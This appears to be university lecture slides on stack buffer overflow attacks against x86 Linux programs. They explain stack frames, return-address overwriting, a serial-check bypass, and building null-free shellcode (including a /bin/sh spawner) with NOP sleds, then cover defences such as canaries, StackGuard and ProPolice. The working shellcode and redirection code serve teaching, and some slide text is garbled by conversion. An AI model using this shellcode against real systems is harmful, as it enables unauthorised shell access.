Attacks Using Stack Buffer Overflow Boxuan Gu gub@cse.ohio-state.edu Reference The Art of Computer Virus Research and Defense (Symantec Press) (Paperback) By Peter Szor Outline Background Stack buffer overflow Shell code How to prevent stack buffer overflow Background Many vulnerability of applications are not from their specifications and protocols but from their implementations Weak implementation of passwords Buffer Overflow (can be used to redirect the control flow of a program) race conditions bugs in permissions Background-Buffer overflow Typical Attack Scenario: Users enter data into a Web form Web form is sent to server Server writes data to buffer, without checking length of input data Data overflows from buffer Sometimes, overflow can enable an attack Web form attack could be carried out by anyone with an Internet connection Background-layout of the Virtual Space of a Process The layout of the virtual space of a process in Linux Cont. Code and data consist of instructions and initialized , uninitialized global and static data respectively; Runtime heap is used for dynamically allocated memory(malloc()); The stack is used whenever a function call is made. Layout Of Stack Grows from high-end address to low-end address (buffer grows from low-end address to high-end address); Return Address- When a function returns, the instructions pointed by it will be executed; Stack Frame pointer(esp)- is used to reference to local variables and function parameters. Example low-end address esp int cal(int a, int b) { int c; c = a + b; return c; } int main () { int d; d = cal(1, 2); printf("%d\n", d); return; } c ebp previous ebp ret addr(0x08048229) a(1) b(2) Stack high-end address Dump of assembler code for function main: 0x08048204 <main+0>: 0x08048208 <main+4>: 0x0804820b <main+7>: 0x0804820e <main+10>: 0x0804820f <main+11>: 0x08048211 <main+13>: 0x08048212 <main+14>: 0x08048215 <main+17>: parameter 0x0804821d <main+25>: parameter 0x08048224 <main+32>: 0x08048229 <main+37>: 0x0804822c <main+40>: 0x0804822f <main+43>: 0x08048233 <main+47>: 0x0804823a <main+54>: 0x0804823f <main+59>: 0x08048242 <main+62>: 0x08048243 <main+63>: 0x08048244 <main+64>: 0x08048247 <main+67>: lea 0x4(%esp),%ecx and $0xfffffff0,%esp pushl -0x4(%ecx) push %ebp mov %esp,%ebp push %ecx sub $0x24,%esp movl $0x2,0x4(%esp) ; pass movl $0x1,(%esp) ; pass call 0x80481f0 <cal> mov %eax,-0x8(%ebp) mov -0x8(%ebp),%eax mov %eax,0x4(%esp) movl $0x80a0c88,(%esp) call 0x8048c40 <printf> add $0x24,%esp pop %ecx pop %ebp lea -0x4(%ecx),%esp ret Dump of assembler code for function cal: 0x080481f0 <cal+0>: push %ebp 0x080481f1 <cal+1>: mov %esp,%ebp 0x080481f3 <cal+3>: sub $0x10,%esp ; reserve 16 bytes for local variables in stack 0x080481f6 <cal+6>: mov 0xc(%ebp),%eax 0x080481f9 <cal+9>: add 0x8(%ebp),%eax 0x080481fc <cal+12>: mov %eax,-0x4(%ebp) 0x080481ff <cal+15>: mov -0x4(%ebp),%eax 0x08048202 <cal+18>: leave 0x08048203 <cal+19>: ret Layout of Heap Global variables Static variables Dynamically allocated memory Stack Buffer Overflow A buffer overflow occurs when too much data is put into the buffer; C language and its derivatives(C++) offer many ways to put more data than anticipated into a buffer; Example Int bof() ESP { char buffer[8]; // an 8 bytes buffer which is in the stack strcpy(“buffer, “AAAAAAAAAAAAAAAAAAA””); // copy 20 bytes into buffer // this will cause to the content of “ret” to be overwritten; // namely, the return address will be 0x41414141(AAAA) EBP return 1; } AAAA AAAA AAAA (previous EBP) AAAA (RET->printf()) int main () { bof(); // call bof printf(“end\n”); // will never be executed; return 1; } AAAA Basic Idea of the Attack using stack buffer overflow Low address Local variable (buffer) Stack grows RET Attack Code High address TOP of Stack String grows Inject malicious code into the virtual space of a process; Modify the content of RET to redirect the execution flow to the malicious code. Example Program asks for a serial number that attacker does not know Attacker also does not have source code Attacker does have the executable (exe) • Program quits on incorrect serial number Cont. • • • • By trial and error, attacker discovers an apparent buffer overflow Note that 0x41 is “A” Looks like ret overwritten by 2 bytes! I think the stack is overwitten by 3 bytes. Cont. The goal is to exploit a buffer overflow so that the execution flow can be re-directed to 0x00401034. Cont. • • • Find that 401034 is “@^P4” in ASCII ('\0' is 00) Byte order is reversed? Why? X86 processors are “little-endian” Cont. • • • Reverse the byte order to “4^P@” (\x34\x10\x40\x00) and… Success! We’ve bypassed serial number check by exploiting a buffer overflow Overwrote the return address on the stack Example-Create a shell char shellcode[] = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; int main(){ char *name[2]; name[0] = "/bin/sh"; name[1] = 0x0; execve(name[0], name, 0x0); exit(0); } Shellcode can be looked as a sequence of binary instructions; The purpose of this shellcode is to create a command shell in linux. It can be used to create a shell with root privilege. Cont. void sh() { int *return; return = (int *)&return + 2; // let ret point to the unit containing the return address (*return) = (int)shellcode; // let the return address point to the shellcode (shell code to create a shell) } int main() { sh(); printf("main end :)\n"); return; } Cont. (gdb) disas sh Dump of assembler code for function sh: 0x08048208 <sh+0>:push %ebp 0x08048209 <sh+1>:mov %esp,%ebp 0x0804820b <sh+3>:sub $0x10,%esp 0x0804820e <sh+6>:lea -0x4(%ebp),%eax 0x08048211 <sh+9>: add $0x8,%eax 0x08048214 <sh+12>: mov %eax,0x4(%ebp) 0x08048217 <sh+15>: mov 0x4(%ebp),%edx 0x0804821a <sh+18>: mov $0x80bd6a0,%eax 0x0804821f <sh+23>: mov %eax,(%edx) 0x08048221 <sh+25>: leave 0x08048222 <sh+26>: ret return Previous ebp RET Three issues for injecting codes How to find a location in the stack to inject malicious code? How to generate a shellcode (Attack Code)? How to redirect the execution flow to the shellcode? If using stack buffer overflow, the content of memory unit storing return address should be modified. The injected payload should be long enough to do overwriting. How to find a location to inject code If using stack buffer overflow, we might need to locate the stack of a function. Then we need to determine the offset from the bottom or the top of stack to inject the shell code We can use the following code to locate a stack: unsigned long find_start(void) { __asm__("movl %esp, %eax"); } unsigned long find_end(void) { __asm__("movl %ebp, %eax"); } Cont. unsigned long find_start(void) { __asm__("movl %esp, %eax"); } unsigned long find_end(void) { __asm__("movl %ebp, %eax"); } int main() { printf("0x%x\n",find_start()); printf("0x%x\n",find_end()); } Shell code Shellcode is defined as a set of instructions which is injected and then is executed by an exploited program; Shellcode is used to directly manipulate registers and the function of a program; Most of shellcodes use system call to do malicious behaviors; System calls is a set of functions which allow you to access operating system-specific functions such as getting input, producing output, exiting a process; How to execute a system call in Linux? Use libc wrappers Ex: read, write etc; Works indirectly with assembly code to execute system calls; Directly use assembly code System call via software interrupts, for example int 0x80; In Linux, a shell code uses int 0x80 to raise system calls. The process of executing a system call The specific system call is loaded into EAX; Arguments to the system call function are placed in other registers; The Instruction int 0x80 is executed; The CPU switches to Kernel mode; The system call function is executed. Example: main() { exit(0); } Cont. gcc -g -static -o exit exit.c gdb exit Arlington:/home/src/shellcodes/code/ch03# gdb exit GNU gdb 6.7.1-debian Copyright (C) 2007 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu"... Using host libthread_db library "/lib/i686/cmov/libthread_db.so.1". (gdb) disas _exit Dump of assembler code for function _exit: 0x0804df4c <_exit+0>: mov 0x4(%esp),%ebx 0x0804df50 <_exit+4>: mov $0xfc,%eax 0x0804df55 <_exit+9>: int $0x80 0x0804df57 <_exit+11>: mov $0x1,%eax 0x0804df5c <_exit+16>: int $0x80 0x0804df5e <_exit+18>: hlt End of assembler dump. Write a shell code for exit() The shell code should do the following: Store the value of 0 into EBX; Store the value of 1 into EAX; Execute int 0x80 instruction Cont. First, we write ASM codes (exit.asm) as follows: Section .text global _start _start: mov ebx, 0 mov eax, 1 int 0x80 Cont. Arlington:/home/src/shellcodes/# nasm -f elf exit.asm Arlington:/home/src/shellcodes/# ld -o exit_1 exit.o Arlington:/home/src/shellcodes/# objdump -d exit_1 exit_1: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: bb 00 00 00 00 8048065: b8 01 00 00 00 804806a: cd 80 mov $0x0,%ebx mov $0x1,%eax int $0x80 Red words can be used as the shell code. Cont. char shellcode[] = "\xbb\x00\x00\x00\x00" "\xb8\x01\x00\x00\x00" "\xcd\x80"; int main() { int *return; return = (int *)&return + 2; (*return) = (int)shellcode; } Injectable Shellcode Null (\x00) will cause shellcode to fail when injected into a character array because \x00 is used to terminate strings; Injectable shellcode can't contain \x00; shellcode[] = "\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80" injectable shellcode; How to remove \x00? Use “xor ebx, ebx” to replace “mov ebx, 0” Use “mov al, 1 ” to replace “mov eax, 1” is not an Cont. bb 00 00 00 00 b8 01 00 00 00 cd 80 mov $0x0,%ebx mov $0x1,%eax int $0x80 After the transformation, the code is changed to : 31 db b0 01 cd 80 xor %ebx, %ebx mov $0x1,%al int 0x80 shellcode[]=”\x31\xdb\xb0\x01\xcd\x80” Questions What is a stack frame? What is a return address? Can we inject shellcodes into any area of the address spaces of processes? A framework for injectable shellcode Jmp short GotoCall shellcode: pop esi // esi will contain the address of '/bin/sh' <shellcode meat> GotoCall: Call shellcode // GetPC code Db '/bin/sh' GetPC Code Call fsave/fstenv Can be used to get the address of last FPU instruction fldz fnstenv [esp-12] pop ecx add cl, 10 nop ECX will hold the address of the EIP. An Example section .text global _start _start: jmp short GotoCall shellcode: pop esi xor eax, eax mov byte [esi + 7], al lea ebx, [esi] mov long [esi + 8], ebx mov long [esi + 12], eax mov byte al, 0x0b mov ebx, esi lea ecx, [esi + 8] lea edx, [esi + 12] int 0x80 GotoCall: Call shellcode // GetPC Code db '/bin/shJAAAAKKKK' // AAAA and KKKK can be parameters for system calls NOP Sled Determining the correct offset for injecting code is not easy; NOP (non operation) sled can be used to increase the number of potential offsets; Generally, we can fill in the beginning of shellcode with NOPs. The opcode for NOP is 0x90 EX: shellcode[]=”\x90\x90\x90\x31\xdb\xb0\x01\xcd\x80” Some FPU, SSE, MMX instructions can also be used as sled . Summary of Launching An Attack Find a buffer overflow that can be used to redirect the control flow of the victim program Stack Buffer Overflow Heap Buffer Overflow Inject a segment of malicious shellcode How to prevent stack buffer overflow? Stack Guard In a stack , a canary word is placed after return address whenever a function is called; The canary will be checked before the function returns. If value of canary is changed , then it indicates an malicious behavior. Local Variables Lower address Old Base Pointer Canary Value Return Address Arguments Higher address 6. Unix Stack Frame Cont. Canary can still be intact if the attacker overwrites it with the correct value Solution – use “random canary” value Use “terminator canary” – consists of all string terminator sequences – NULL, ‘\r’, ‘\n’, -1… Attacker can still point to the ‘return address’ and change it, without worrying about the canary This is a short-coming of StackGuard Can be dealt by XORing the canary value and ‘return address’ to detect if ‘return address’ has changed Stack Shield. Stack Shield Copy RET address into an unoverflowable memory region; The values of two RET addresses will be compared before a function returns; If the values are different, then an malicious exploitation occurs; Needs another stack-like data structure to maintain RET addresses. ProPolice Perhaps most sophisticated compiler protection Rearrange local variables such that char buffers always are allocated at bottom addresses ( top of the stack), and are guarded by a Guard Value Does not work fine with small buffers – somewhat unstable Local Variables and Pointers Lower address Local char buffers Guard Value Old Base Pointer Return Address Arguments Higher address 7. Unix Stack Frame Cont. Non-Executable stack; Return-to-libc exploitation might occur Randomization.